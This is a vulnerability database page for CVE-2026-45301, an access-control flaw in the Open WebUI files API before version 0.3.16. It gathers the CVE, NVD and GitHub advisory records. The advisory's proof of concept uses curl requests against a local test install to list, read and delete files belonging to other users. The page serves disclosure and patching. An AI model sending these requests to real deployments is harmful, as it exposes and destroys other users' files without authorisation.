Vulnerability-Lookup

CVE-2026-45301 (GCVE-0-2026-45301)

Vulnerability from cvelistv5 – Published: 2026-05-15 21:19 – Updated: 2026-05-19 03:55

Title

Open WebUI: Missing permission check in files API allows authenticated users to list, access and delete every uploaded file

Summary

Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.3.16, a missing permission check in all files related API endpoints allows any authenticated user to list, access and delete every file uploaded by every user to the platform. This vulnerability is fixed in 0.3.16.

Severity ?

8.1 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

CWE

CWE-284 - Improper Access Control

Assigner

GitHub_M

References

1 reference

URL	Tags
https://github.com/open-webui/open-webui/security…	x_refsource_CONFIRM

Impacted products

1 product

Vendor	Product	Version
open-webui	open-webui	Affected: < 0.3.16

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-45301",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-05-18T00:00:00+00:00",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-05-19T03:55:28.437Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-r8wh-8m7r-fh33"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "open-webui",
          "vendor": "open-webui",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 0.3.16"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.3.16, a missing permission check in all files related API endpoints allows any authenticated user to list, access and delete every file uploaded by every user to the platform. This vulnerability is fixed in 0.3.16."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 8.1,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-284",
              "description": "CWE-284: Improper Access Control",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-05-15T21:19:46.004Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/open-webui/open-webui/security/advisories/GHSA-r8wh-8m7r-fh33",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-r8wh-8m7r-fh33"
        }
      ],
      "source": {
        "advisory": "GHSA-r8wh-8m7r-fh33",
        "discovery": "UNKNOWN"
      },
      "title": "Open WebUI: Missing permission check in files API allows authenticated users to list, access and delete every uploaded file"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-45301",
    "datePublished": "2026-05-15T21:19:46.004Z",
    "dateReserved": "2026-05-11T20:14:43.202Z",
    "dateUpdated": "2026-05-19T03:55:28.437Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2026-45301",
      "date": "2026-05-24",
      "epss": "0.00033",
      "percentile": "0.1001"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-45301\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-05-15T22:16:53.837\",\"lastModified\":\"2026-05-18T20:16:38.997\",\"vulnStatus\":\"Modified\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.3.16, a missing permission check in all files related API endpoints allows any authenticated user to list, access and delete every file uploaded by every user to the platform. This vulnerability is fixed in 0.3.16.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N\",\"baseScore\":8.1,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":2.8,\"impactScore\":5.2}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-284\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:openwebui:open_webui:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"0.3.16\",\"matchCriteriaId\":\"7B4F10B8-C7E9-4160-AAB9-C3375EE2B6A2\"}]}]}],\"references\":[{\"url\":\"https://github.com/open-webui/open-webui/security/advisories/GHSA-r8wh-8m7r-fh33\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]},{\"url\":\"https://github.com/open-webui/open-webui/security/advisories/GHSA-r8wh-8m7r-fh33\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-45301\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-05-18T19:40:58.272427Z\"}}}], \"references\": [{\"url\": \"https://github.com/open-webui/open-webui/security/advisories/GHSA-r8wh-8m7r-fh33\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-05-18T19:41:18.481Z\"}}], \"cna\": {\"title\": \"Open WebUI: Missing permission check in files API allows authenticated users to list, access and delete every uploaded file\", \"source\": {\"advisory\": \"GHSA-r8wh-8m7r-fh33\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 8.1, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"open-webui\", \"product\": \"open-webui\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 0.3.16\"}]}], \"references\": [{\"url\": \"https://github.com/open-webui/open-webui/security/advisories/GHSA-r8wh-8m7r-fh33\", \"name\": \"https://github.com/open-webui/open-webui/security/advisories/GHSA-r8wh-8m7r-fh33\", \"tags\": [\"x_refsource_CONFIRM\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.3.16, a missing permission check in all files related API endpoints allows any authenticated user to list, access and delete every file uploaded by every user to the platform. This vulnerability is fixed in 0.3.16.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-284\", \"description\": \"CWE-284: Improper Access Control\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-05-15T21:19:46.004Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-45301\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-05-19T03:55:28.437Z\", \"dateReserved\": \"2026-05-11T20:14:43.202Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-05-15T21:19:46.004Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

FKIE_CVE-2026-45301

Vulnerability from fkie_nvd - Published: 2026-05-15 22:16 - Updated: 2026-05-18 20:16

Severity ?

8.1 (High) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/open-webui/open-webui/security/advisories/GHSA-r8wh-8m7r-fh33	Exploit, Vendor Advisory
	134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/open-webui/open-webui/security/advisories/GHSA-r8wh-8m7r-fh33	Exploit, Vendor Advisory

Impacted products

	Vendor	Product	Version
	openwebui	open_webui	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:openwebui:open_webui:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "7B4F10B8-C7E9-4160-AAB9-C3375EE2B6A2",
              "versionEndExcluding": "0.3.16",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.3.16, a missing permission check in all files related API endpoints allows any authenticated user to list, access and delete every file uploaded by every user to the platform. This vulnerability is fixed in 0.3.16."
    }
  ],
  "id": "CVE-2026-45301",
  "lastModified": "2026-05-18T20:16:38.997",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 8.1,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 5.2,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-05-15T22:16:53.837",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-r8wh-8m7r-fh33"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-r8wh-8m7r-fh33"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-284"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

GHSA-R8WH-8M7R-FH33

Vulnerability from github – Published: 2026-05-14 20:15 – Updated: 2026-05-19 15:58

Summary

Open WebUI: Missing permission check in files API allows authenticated users to list, access and delete every uploaded file

Details

Summary

A missing permission check in all files related API endpoints allows any authenticated user to list, access and delete every file uploaded by every user to the platform.

Details

All files/ related endpoints lack permission checks.

Listing all files

For example, let's see how file listing is implemented: https://github.com/open-webui/open-webui/blob/e2b7296786053dfc77f6ae0205a1b195e05a712c/backend/apps/webui/routers/files.py#L107-L110 https://github.com/open-webui/open-webui/blob/e2b7296786053dfc77f6ae0205a1b195e05a712c/backend/apps/webui/models/files.py#L26 Notice the endpoint depends only on an authenticated user check, no file filtering is done to match the uploaded files' user_id to the requesting user.

This problem repeats itself throughout the various route implementations, allowing any user to perform actions on any file. Some note worthy functions:

Accessing the content of any file

https://github.com/open-webui/open-webui/blob/e2b7296786053dfc77f6ae0205a1b195e05a712c/backend/apps/webui/routers/files.py#L173-L193

Deleting any file

https://github.com/open-webui/open-webui/blob/e2b7296786053dfc77f6ae0205a1b195e05a712c/backend/apps/webui/routers/files.py#L224-L241

PoC

Configuration

I ran a clean install of the latest version using one of the docker one-liners on an Ubuntu desktop: docker run -d -p 3000:8080 -v ollama:/root/.ollama -v open-webui:/app/backend/data --name open-webui --restart always ghcr.io/open-webui/open-webui:ollama
I created an admin user
I created a second user to act as the threat actor with no elevated permissions
Admin user uploaded test.txt in a conversation with model
Admin user uploaded mydeepest_secret.docx in a conversation with model

Listing files uploaded by other users

Login to threat actor
Perform a GET request to /api/v1/files/

curl -X 'GET' \
  'http://localhost:3000/api/v1/files/' \
  -H 'accept: application/json'

[
  {
    "id": "b9733e9c-0714-4425-8915-d0361bf66dfc",
    "user_id": "c0c16e7a-6f81-4863-8b71-e56e2e389cf1",
    "filename": "b9733e9c-0714-4425-8915-d0361bf66dfc_test.txt",
    "meta": {
      "name": "test.txt",
      "content_type": "text/plain",
      "size": 4,
      "path": "/app/backend/data/uploads/b9733e9c-0714-4425-8915-d0361bf66dfc_test.txt"
    },
    "created_at": 1724709202
  },
  {
    "id": "8f058e18-fec1-4b9f-bb4e-c17f39d03c98",
    "user_id": "c0c16e7a-6f81-4863-8b71-e56e2e389cf1",
    "filename": "8f058e18-fec1-4b9f-bb4e-c17f39d03c98_mydeepest_secret.docx",
    "meta": {
      "name": "mydeepest_secret.docx",
      "content_type": "application/vnd.openxmlformats-officedocument.wordprocessingml.document",
      "size": 6485,
      "path": "/app/backend/data/uploads/8f058e18-fec1-4b9f-bb4e-c17f39d03c98_mydeepest_secret.docx"
    },
    "created_at": 1724710236
  }
]

Accessing other users' file content

Login to threat actor
Perform a GET request to /api/v1/files/{id}/content

curl -X 'GET' \
  'http://localhost:3000/api/v1/files/b9733e9c-0714-4425-8915-d0361bf66dfc/content' \
  -H 'accept: application/json'

wow

Deleting another user's uploaded file

Login to threat actor
Perform a DELETE request to /api/v1/files/{id}

curl -X 'DELETE' \
  'http://localhost:3000/api/v1/files/8f058e18-fec1-4b9f-bb4e-c17f39d03c98' \
  -H 'accept: application/json'

{
  "message": "File deleted successfully"
}

We will verify this action by furthur listing all files as mentioned above:

[
  {
    "id": "b9733e9c-0714-4425-8915-d0361bf66dfc",
    "user_id": "c0c16e7a-6f81-4863-8b71-e56e2e389cf1",
    "filename": "b9733e9c-0714-4425-8915-d0361bf66dfc_test.txt",
    "meta": {
      "name": "test.txt",
      "content_type": "text/plain",
      "size": 4,
      "path": "/app/backend/data/uploads/b9733e9c-0714-4425-8915-d0361bf66dfc_test.txt"
    },
    "created_at": 1724709202
  }
]

Impact

Having access to user uploaded files, regardless of ownership or permission level, breaks the confidentiality of sensitive data stored by users. Furthermore, the ability to delete other user's uploaded files disrupts the integrity of the system.

Personal Notice

In case this submission does get recognized and numbered as a CVE I'd perfer to be credited by my full name - Yuval Gal, instead of my GitHub handle.

Thanks in advance and have a good week (:

Credits

This vulnerability was reported by Yuval Gal (GitHub: @vi11ain).

Severity ?

8.1 (High)


                  
                    CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.3.15"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "open-webui"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.3.16"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-45301"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-284"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-14T20:15:53Z",
    "nvd_published_at": "2026-05-15T22:16:53Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nA missing permission check in all files related API endpoints allows any authenticated user to list, access and delete every file uploaded by every user to the platform.\n\n### Details\nAll `files/` related endpoints lack permission checks.\n\n#### Listing all files\nFor example, let\u0027s see how file listing is implemented:\nhttps://github.com/open-webui/open-webui/blob/e2b7296786053dfc77f6ae0205a1b195e05a712c/backend/apps/webui/routers/files.py#L107-L110\nhttps://github.com/open-webui/open-webui/blob/e2b7296786053dfc77f6ae0205a1b195e05a712c/backend/apps/webui/models/files.py#L26\nNotice the endpoint depends only on an authenticated user check, no file filtering is done to match the uploaded files\u0027 `user_id` to the requesting user.\n\nThis problem repeats itself throughout the various route implementations, allowing any user to perform actions on any file.\nSome note worthy functions:\n#### Accessing the content of any file\nhttps://github.com/open-webui/open-webui/blob/e2b7296786053dfc77f6ae0205a1b195e05a712c/backend/apps/webui/routers/files.py#L173-L193\n#### Deleting any file\nhttps://github.com/open-webui/open-webui/blob/e2b7296786053dfc77f6ae0205a1b195e05a712c/backend/apps/webui/routers/files.py#L224-L241\n\n### PoC\n#### Configuration\n1. I ran a clean install of the latest version using one of the docker one-liners on an Ubuntu desktop:\n`docker run -d -p 3000:8080 -v ollama:/root/.ollama -v open-webui:/app/backend/data --name open-webui --restart always ghcr.io/open-webui/open-webui:ollama`\n2. I created an admin user\n3. I created a second user to act as the threat actor with no elevated permissions\n4. Admin user uploaded `test.txt` in a conversation with model\n5. Admin user uploaded `mydeepest_secret.docx` in a conversation with model\n\n#### Listing files uploaded by other users\n1. Login to threat actor\n2. Perform a GET request to `/api/v1/files/`\n```sh\ncurl -X \u0027GET\u0027 \\\n  \u0027http://localhost:3000/api/v1/files/\u0027 \\\n  -H \u0027accept: application/json\u0027\n```\n```json\n[\n  {\n    \"id\": \"b9733e9c-0714-4425-8915-d0361bf66dfc\",\n    \"user_id\": \"c0c16e7a-6f81-4863-8b71-e56e2e389cf1\",\n    \"filename\": \"b9733e9c-0714-4425-8915-d0361bf66dfc_test.txt\",\n    \"meta\": {\n      \"name\": \"test.txt\",\n      \"content_type\": \"text/plain\",\n      \"size\": 4,\n      \"path\": \"/app/backend/data/uploads/b9733e9c-0714-4425-8915-d0361bf66dfc_test.txt\"\n    },\n    \"created_at\": 1724709202\n  },\n  {\n    \"id\": \"8f058e18-fec1-4b9f-bb4e-c17f39d03c98\",\n    \"user_id\": \"c0c16e7a-6f81-4863-8b71-e56e2e389cf1\",\n    \"filename\": \"8f058e18-fec1-4b9f-bb4e-c17f39d03c98_mydeepest_secret.docx\",\n    \"meta\": {\n      \"name\": \"mydeepest_secret.docx\",\n      \"content_type\": \"application/vnd.openxmlformats-officedocument.wordprocessingml.document\",\n      \"size\": 6485,\n      \"path\": \"/app/backend/data/uploads/8f058e18-fec1-4b9f-bb4e-c17f39d03c98_mydeepest_secret.docx\"\n    },\n    \"created_at\": 1724710236\n  }\n]\n```\n\n#### Accessing other users\u0027 file content\n1. Login to threat actor\n2. Perform a GET request to `/api/v1/files/{id}/content`\n```sh\ncurl -X \u0027GET\u0027 \\\n  \u0027http://localhost:3000/api/v1/files/b9733e9c-0714-4425-8915-d0361bf66dfc/content\u0027 \\\n  -H \u0027accept: application/json\u0027\n```\n```\nwow\n```\n\n#### Deleting another user\u0027s uploaded file\n1. Login to threat actor\n2. Perform a DELETE request to `/api/v1/files/{id}`\n```sh\ncurl -X \u0027DELETE\u0027 \\\n  \u0027http://localhost:3000/api/v1/files/8f058e18-fec1-4b9f-bb4e-c17f39d03c98\u0027 \\\n  -H \u0027accept: application/json\u0027\n```\n```json\n{\n  \"message\": \"File deleted successfully\"\n}\n```\n3. We will verify this action by furthur listing all files as mentioned above:\n```json\n[\n  {\n    \"id\": \"b9733e9c-0714-4425-8915-d0361bf66dfc\",\n    \"user_id\": \"c0c16e7a-6f81-4863-8b71-e56e2e389cf1\",\n    \"filename\": \"b9733e9c-0714-4425-8915-d0361bf66dfc_test.txt\",\n    \"meta\": {\n      \"name\": \"test.txt\",\n      \"content_type\": \"text/plain\",\n      \"size\": 4,\n      \"path\": \"/app/backend/data/uploads/b9733e9c-0714-4425-8915-d0361bf66dfc_test.txt\"\n    },\n    \"created_at\": 1724709202\n  }\n]\n```\n\n### Impact\nHaving access to user uploaded files, regardless of ownership or permission level, breaks the confidentiality of sensitive data stored by users. Furthermore, the ability to delete other user\u0027s uploaded files disrupts the integrity of the system.\n\n### Personal Notice\nIn case this submission does get recognized and numbered as a CVE I\u0027d perfer to be credited by my full name - Yuval Gal, instead of my GitHub handle.\n\nThanks in advance and have a good week (:\n\n## Credits\n\nThis vulnerability was reported by **Yuval Gal** (GitHub: @vi11ain).",
  "id": "GHSA-r8wh-8m7r-fh33",
  "modified": "2026-05-19T15:58:03Z",
  "published": "2026-05-14T20:15:53Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-r8wh-8m7r-fh33"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45301"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/open-webui/open-webui"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Open WebUI: Missing permission check in files API allows authenticated users to list, access and delete every uploaded file"
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-45301 (GCVE-0-2026-45301)

FKIE_CVE-2026-45301

GHSA-R8WH-8M7R-FH33

Summary

Details

Listing all files

Accessing the content of any file

Deleting any file

PoC

Configuration

Listing files uploaded by other users

Accessing other users' file content

Deleting another user's uploaded file

Impact

Personal Notice

Credits

Tags

Sightings

Nomenclature